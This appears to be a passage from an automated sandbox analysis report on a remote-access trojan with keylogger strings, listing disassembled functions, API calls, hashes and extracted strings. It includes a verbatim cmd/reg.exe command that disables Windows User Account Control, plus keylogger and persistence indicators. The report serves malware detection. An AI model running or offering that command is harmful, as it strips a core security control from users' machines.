                                                              • Opcode ID: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                              • Instruction ID: b0a34e1ed6630e1fb57c9e62860a3601010315cd62f19612bff23542d182db60
                                                              • Opcode Fuzzy Hash: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                              • Instruction Fuzzy Hash: 70412AB1600704BFE724AF79CD41B5EBBE8EB88714F10462FF145DB281E3B999058798
                                                              Function 00404CC3 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121synchronizationthreadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                                              • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404DD2
                                                              • CloseHandle.KERNEL32(?), ref: 00404DDB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                              • String ID: PkGNG
                                                              • API String ID: 3360349984-263838557
                                                              • Opcode ID: 77a6d032992f3495e2e52a01d2ead9a1ebcb79a8041a0f526cc04fc7fe31482d
                                                              • Instruction ID: 30d48123e17294c38ae6f490953f1b42a5ca81467cb0df1087f173bd09261e59
                                                              • Opcode Fuzzy Hash: 77a6d032992f3495e2e52a01d2ead9a1ebcb79a8041a0f526cc04fc7fe31482d
                                                              • Instruction Fuzzy Hash: 684182B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                                              Function 0040B19F Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B1AD
                                                              • wsprintfW.USER32 ref: 0040B22E
                                                                • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: EventLocalTimewsprintf
                                                              • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                              • API String ID: 1497725170-248792730
                                                              • Opcode ID: b92970106d7d5ed65003fb4f3b7a0e91fd1e2f7406e6a9ff2526561c329a63fb
                                                              • Instruction ID: 4bcbbea8953a56f0834a7592719eb704c83d71ae81c48fe005db4fd1b538d991
                                                              • Opcode Fuzzy Hash: b92970106d7d5ed65003fb4f3b7a0e91fd1e2f7406e6a9ff2526561c329a63fb
                                                              • Instruction Fuzzy Hash: 88114272404118AACB19AB96EC55CFE77BCEE48315B00012FF506A61D1FF7C5A45C6AD
                                                              Function 0040A6B0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A788), ref: 0040A6E6
                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                              • Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,0040A788), ref: 0040A729
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$CloseCreateHandleSizeSleep
                                                              • String ID: XQG
                                                              • API String ID: 1958988193-3606453820
                                                              • Opcode ID: 09b71735cca9286fb237afdc81f34cc8b89fa37515d8f2a58262fc809d9c95cd
                                                              • Instruction ID: fa029248b1ac628aedb802b18ed81a98d1a4018e107c0b234daa3009ae89debe
                                                              • Opcode Fuzzy Hash: 09b71735cca9286fb237afdc81f34cc8b89fa37515d8f2a58262fc809d9c95cd
                                                              • Instruction Fuzzy Hash: 96110130600740AADA31A734988961F7BA9DB45356F44483EF1866B6D3C67DDC64C71F
                                                              Function 0041D5A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegisterClassExA.USER32(00000030), ref: 0041D5EC
                                                              • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D607
                                                              • GetLastError.KERNEL32 ref: 0041D611
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ClassCreateErrorLastRegisterWindow
                                                              • String ID: 0$MsgWindowClass
                                                              • API String ID: 2877667751-2410386613
                                                              • Opcode ID: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                              • Instruction ID: e808ecd18ef19f47bd472c0c6462b34ef8490c58390ad3ae495a6aa035ed2a4b
                                                              • Opcode Fuzzy Hash: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                              • Instruction Fuzzy Hash: 1F0125B1D00219ABDB00DFA5EC849EFBBBCEA08355F40453AF914A6241EB7589058AA4
                                                              Function 00407790 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004077D6
                                                              • CloseHandle.KERNEL32(?), ref: 004077E5
                                                              • CloseHandle.KERNEL32(?), ref: 004077EA
                                                              Strings
                                                              • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004077CC
                                                              • C:\Windows\System32\cmd.exe, xrefs: 004077D1
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseHandle$CreateProcess
                                                              • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                              • API String ID: 2922976086-4183131282
                                                              • Opcode ID: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                              • Instruction ID: 1887ccd63cb29ce90d3c4a9dee080bc6fb52b3336ad705aa4023eed0db3a7680
                                                              • Opcode Fuzzy Hash: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                              • Instruction Fuzzy Hash: 04F09672D4029C76CB20ABD7AC0EEDF7F3CEBC5B11F00051AF904A2045DA745400CAB5
                                                              Function 0040729B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe, xrefs: 004076FF
                                                              • SG, xrefs: 00407715
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: SG$C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe
                                                              • API String ID: 0-3843410488
                                                              • Opcode ID: 534232ae4986bc0cd44d5d9dbb6e579f37bf6e7b645008295a27304146529b35
                                                              • Instruction ID: 5ffff352cfcc2e87221e4fa572a01d73507d198e899e6baa5594ec663d9dd15d
                                                              • Opcode Fuzzy Hash: 534232ae4986bc0cd44d5d9dbb6e579f37bf6e7b645008295a27304146529b35
                                                              • Instruction Fuzzy Hash: 8DF02BB0E04600EBCB1477345D296AA3656A780397F40487BF507EB2F2EBBD5C41871E
                                                              Function 004050E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EF8), ref: 00405120
                                                              • SetEvent.KERNEL32(?), ref: 0040512C
                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00405137
                                                              • CloseHandle.KERNEL32(?), ref: 00405140
                                                                • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                              • String ID: KeepAlive | Disabled
                                                              • API String ID: 2993684571-305739064
                                                              • Opcode ID: 260c2b08e01b5d66b359e99273a0c89895ec309b6af50f33d4504d26b953d9d7
                                                              • Instruction ID: dc79248355977efa3495ea8e96f68553e1f2867eb32bbe7dc6984d352a193ca4
                                                              • Opcode Fuzzy Hash: 260c2b08e01b5d66b359e99273a0c89895ec309b6af50f33d4504d26b953d9d7
                                                              • Instruction Fuzzy Hash: 5DF06D71904711BBDB203B758D0AAAB7E95AB06315F0009BEF982916E2D6798C408F9A
                                                              Function 0041AE51 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                              • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041AE83
                                                              • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE91
                                                              • Sleep.KERNEL32(00002710), ref: 0041AE98
                                                              • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AEA1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: PlaySound$HandleLocalModuleSleepTime
                                                              • String ID: Alarm triggered
                                                              • API String ID: 614609389-2816303416
                                                              • Opcode ID: fc1dfc3d80636db02bd80d67f349f84282c1adb2487fd06cf6dad27e320cdf65
                                                              • Instruction ID: 264e31dd7f8ae4a58c3cd97330858728e5483d82e525179ed11d996d756d41c5
                                                              • Opcode Fuzzy Hash: fc1dfc3d80636db02bd80d67f349f84282c1adb2487fd06cf6dad27e320cdf65
                                                              • Instruction Fuzzy Hash: 3EE0D826A40220779A10337B6D0FD6F3D29CAC3B2570100BFFA05660C2DD540C01C6FB
                                                              Function 0041CDE9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CE7E), ref: 0041CDF3
                                                              • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CE7E), ref: 0041CE00
                                                              • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CE7E), ref: 0041CE0D
                                                              • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CE7E), ref: 0041CE20
                                                              Strings
                                                              • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CE13
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                              • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                              • API String ID: 3024135584-2418719853
                                                              • Opcode ID: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                              • Instruction ID: 3099d3b49c49d1df3d44327ff87017ee7d1b0803ff7cdb2815dc6b7c28d9377e
                                                              • Opcode Fuzzy Hash: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                              • Instruction Fuzzy Hash: B6E04872504315E7E31027B5EC4DCAB7B7CE745613B100266FA16915D39A749C41C6B5
                                                              Function 004413EA Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3500d967bf213ad3b95b014004bc41782de99095ad53c5e0f3d0147f9504bf37
                                                              • Instruction ID: 15e211ccade7fc2a5debfa8ad78d9bfa955d5b29a73147504924d067d3782226
                                                              • Opcode Fuzzy Hash: 3500d967bf213ad3b95b014004bc41782de99095ad53c5e0f3d0147f9504bf37
                                                              • Instruction Fuzzy Hash: 2771D4319012569BEB21CF55C884AFFBB75EF55310F19412BE815672A0DB78CCC1CBA8
                                                              Function 004493E5 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                                              • _free.LIBCMT ref: 0044943D
                                                                • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                              • _free.LIBCMT ref: 00449609
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                              • String ID:
                                                              • API String ID: 1286116820-0
                                                              • Opcode ID: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                                              • Instruction ID: 45cf5ea20785abb2a7eec221213eb08c1b8584214e6df16efc40294c4842d026
                                                              • Opcode Fuzzy Hash: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                                              • Instruction Fuzzy Hash: 1B51EC71900205ABEB14EF69DD819AFB7B8EF44724F20066FE418D3291EB789D41DB58
                                                              Function 0040F938 Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F956
                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 0040F97A
                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F989
                                                              • CloseHandle.KERNEL32(00000000), ref: 0040FB40
                                                                • Part of subcall function 0041C076: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F634,00000000,?,?,00475338), ref: 0041C08B
                                                                • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FB31
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                              • String ID:
                                                              • API String ID: 4269425633-0
                                                              • Opcode ID: f228ff349881c5e95adb389dcff9344117252c23684542f11b6a3310bcbf0aa2
                                                              • Instruction ID: d02cab962e177bd28921c4f9a71df23b762ba7d31cecf8da060328e0f3db66c6
                                                              • Opcode Fuzzy Hash: f228ff349881c5e95adb389dcff9344117252c23684542f11b6a3310bcbf0aa2
                                                              • Instruction Fuzzy Hash: 5F4136311083419BC325F722DC51AEFB3A5AF94305F50493EF58A921E2EF385A49C65A
                                                              Function 00443E99 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free
                                                              • String ID:
                                                              • API String ID: 269201875-0
                                                              • Opcode ID: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                              • Instruction ID: bbec49e9ccdd5c2af131aecc9b6810ea24321c3eb42f74c08fbdd36582e243a3
                                                              • Opcode Fuzzy Hash: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                              • Instruction Fuzzy Hash: 5F41E232E00200AFEB14DF78C881A5EB3B5EF89B18F1545AEE915EB351D735AE05CB84
                                                              Function 0044F3DA Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E3
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F406
                                                                • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F42C
                                                              • _free.LIBCMT ref: 0044F43F
                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F44E
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                              • String ID:
                                                              • API String ID: 336800556-0
                                                              • Opcode ID: 7d1f56057eec42b9e44eaca7954531e52edb8e618f6c0f5134274d299c642649
                                                              • Instruction ID: b6d7bf627ac8e1e23e8e90154f8049d5dc13ee9613ce4caf203d647ba434722a
                                                              • Opcode Fuzzy Hash: 7d1f56057eec42b9e44eaca7954531e52edb8e618f6c0f5134274d299c642649
                                                              • Instruction Fuzzy Hash: 2401DF72602721BF37211ABB5C8DC7F6AACDEC6FA5355013AFD04D2202DE688D0691B9
                                                              Function 0041C482 Relevance: 7.6, APIs: 5, Instructions: 67fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C5A1,00000000,00000000,00000000), ref: 0041C4C1
                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041C5A1,00000000,00000000), ref: 0041C4DE
                                                              • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C5A1,00000000,00000000), ref: 0041C4EA
                                                              • WriteFile.KERNEL32(00000000,00000000,00000000,00406FC0,00000000,?,00000004,00000000,0041C5A1,00000000,00000000), ref: 0041C4FB
                                                              • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C5A1,00000000,00000000), ref: 0041C508
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$CloseHandle$CreatePointerWrite
                                                              • String ID:
                                                              • API String ID: 1852769593-0
                                                              • Opcode ID: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                              • Instruction ID: 0233a984b642d2e84dd4fc2cab076f06cd7f632185dc4648213adf39284592b7
                                                              • Opcode Fuzzy Hash: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                              • Instruction Fuzzy Hash: 6311E571288215BFE7104A24ACC8EBB739CEB46365F10862BF912D22D0C624DC418639
                                                              Function 00448319 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastError.KERNEL32(?,00000000,?,0043BCD6,00000000,?,?,0043BD5A,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0044831E
                                                              • _free.LIBCMT ref: 00448353
                                                              • _free.LIBCMT ref: 0044837A
                                                              • SetLastError.KERNEL32(00000000), ref: 00448387
                                                              • SetLastError.KERNEL32(00000000), ref: 00448390
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast$_free
                                                              • String ID:
                                                              • API String ID: 3170660625-0
                                                              • Opcode ID: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                                              • Instruction ID: 5af5a014564f127a9d6b3613d5887cb4baea3ca98ff5bc54bcf39f1731b7af1a
                                                              • Opcode Fuzzy Hash: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                                              • Instruction Fuzzy Hash: 3401F936100B006BB7117A2A5C45E6F3259DBD2B75B35093FFD1892292EF7ECC02812D
                                                              Function 00450A3C Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • _free.LIBCMT ref: 00450A54
                                                                • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                              • _free.LIBCMT ref: 00450A66
                                                              • _free.LIBCMT ref: 00450A78
                                                              • _free.LIBCMT ref: 00450A8A
                                                              • _free.LIBCMT ref: 00450A9C
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                              • Instruction ID: 72fff71e7c38304dd33e0b5962bcef44c8ad6e5fbb3f6de42623dcf71f8de19c
                                                              • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                              • Instruction Fuzzy Hash: F7F012765053006B9620EB5DE883C1773D9EA157117A68C1BF549DB652C778FCC0866C
                                                              Function 004440E8 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _free.LIBCMT ref: 00444106
                                                                • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                              • _free.LIBCMT ref: 00444118
                                                              • _free.LIBCMT ref: 0044412B
                                                              • _free.LIBCMT ref: 0044413C
                                                              • _free.LIBCMT ref: 0044414D
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                              • Instruction ID: 0e9c2896d1a2baf17e4b980eca3efa8a556ca0a6e45d827b59e8921ed08f8926
                                                              • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                              • Instruction Fuzzy Hash: 91F03AB18025208FA731AF2DBD528053BA1A705720356853BF40C62A71C7B849C2DFDF
                                                              Function 0044BAB7 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: PkGNG
                                                              • API String ID: 0-263838557
                                                              • Opcode ID: 5e00ae4c16f04a5a408ad6ef1dd4f82ff0aaed16414488ba1079334ecebbb015
                                                              • Instruction ID: da8fb74aa53f7b39327717419ea6793f6800af9799f3d5c2cf6102f7e15971fb
                                                              • Opcode Fuzzy Hash: 5e00ae4c16f04a5a408ad6ef1dd4f82ff0aaed16414488ba1079334ecebbb015
                                                              • Instruction Fuzzy Hash: 1451C171D00209AAEF109FA5D885BAFBBB8EF45314F14015FE905A7291CB38D911CBA9
                                                              Function 0044E769 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _strpbrk.LIBCMT ref: 0044E7B8
                                                              • _free.LIBCMT ref: 0044E8D5
